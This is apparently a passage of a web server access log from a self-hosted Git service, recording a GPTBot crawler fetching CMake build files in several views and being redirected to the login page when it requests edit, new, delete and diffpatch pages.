(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:48:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14525] [Gzip 8.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:48:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:48:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:48:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14933] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:18:48:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11379] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:18:48:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 28166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:18:48:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 1517] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:18:48:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:18:48:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:18:48:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11228] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:18:48:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14490] [Gzip 4.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:18:48:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11312] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:18:48:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11312] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:18:48:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:48:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:48:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:48:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:48:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4766] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:18:48:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10349] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:48:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9855] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:48:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 939] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:48:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 1015] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:18:48:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9845] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:18:48:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:48:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 923] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:18:48:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 15088] [Gzip 9.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:18:48:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:18:48:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11274] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:48:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:48:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:48:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:48:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:48:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11276] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:48:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:48:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:48:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14549] [Gzip 8.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:18:48:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9880] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:18:48:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:18:48:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:18:48:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11399] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:48:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14395] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:18:48:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9841] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:18:48:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14894] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:18:48:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11340] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:18:48:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:48:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:48:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11274] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:18:48:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11268] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:18:48:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:18:48:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:18:48:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19726] [Gzip 6.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:18:48:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11379] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:18:48:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16266] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:18:48:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:18:48:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:18:48:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:18:48:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" 